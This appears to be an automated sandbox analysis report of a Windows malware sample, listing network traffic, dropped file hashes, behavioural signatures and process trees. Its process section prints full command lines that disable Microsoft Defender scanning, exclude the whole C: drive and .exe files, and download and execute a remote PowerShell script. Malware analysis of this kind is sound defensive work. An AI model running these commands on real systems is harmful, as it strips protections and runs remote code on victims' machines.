US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 237.140.159.162.in-addr.arpa udp
US 104.21.55.56:443 api.logflare.app tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 graph.org udp
NL 149.154.164.13:443 graph.org tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 13.164.154.149.in-addr.arpa udp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 telegra.ph udp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
NL 149.154.164.13:443 telegra.ph tcp
US 8.8.8.8:53 133.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 api.skt.cam udp
US 172.67.147.63:443 api.skt.cam tcp
US 8.8.8.8:53 63.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 microsoft.devq.workers.dev udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
US 8.8.8.8:53 174.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1460-5-0x0000000000990000-0x0000000004108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xcutgyo.l4u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3616-10-0x00000216CBA50000-0x00000216CBA72000-memory.dmp

memory/3616-11-0x00000216CBAF0000-0x00000216CBB00000-memory.dmp

memory/3616-12-0x00007FF83C273000-0x00007FF83C275000-memory.dmp

memory/4072-22-0x00000226BBFA0000-0x00000226BBFE4000-memory.dmp

memory/4072-23-0x00000226BC070000-0x00000226BC0E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256 be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512 ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp

MD5 6d9b5a3b75da266db5c237b0ac70b7f9
SHA1 9ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256 d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512 fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

C:\Users\Admin\AppData\Local\Temp\MSIBFF4.tmp

MD5 684f2d21637cb5835172edad55b6a8d9
SHA1 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256 da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA512 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

memory/1460-48-0x0000000000990000-0x0000000004108000-memory.dmp

memory/1460-50-0x0000000000990000-0x0000000004108000-memory.dmp

C:\Users\Admin\AppData\Local\svchost\svchost.exe

MD5 29304e42dc26d1276ca93a9c013599a4
SHA1 65437796133c2704d20757c99b768ffd915d1502
SHA256 83e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9
SHA512 fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca

C:\Users\Admin\AppData\Local\svchost\svchost.msh

MD5 90f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1 e46a39e7252e086f34d64c3d720442cd325de506
SHA256 7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512 f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 12:07

Reported

2024-10-16 12:10

Platform

win7-20240903-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1928 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 2668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2004 wrote to memory of 2668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2004 wrote to memory of 2668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2004 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2648 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2592 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3028 wrote to memory of 616 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIF6FC.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A3DB54298C273249030CB771A4DC86AD C

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp

Files

memory/1928-1-0x0000000000CC0000-0x0000000004438000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 186f3b27fdc3ff6d33d9231174d28082
SHA1 1a832d9159f74e3c838f487ca7c58227ffe2acdd
SHA256 60331954e6070f03e5c0ce799bee78e0c0830d8a0a97acd81ef46d13fd64e92c
SHA512 cb36cbe91737ca5b04b56ced61dd01e1af3df7bb236564871c37d9c253f666bc7d5e04a6e55f066ab0bc471bd189536f370a9c36d3046de281b048596d29b98a

memory/2100-11-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2100-12-0x0000000002390000-0x0000000002398000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
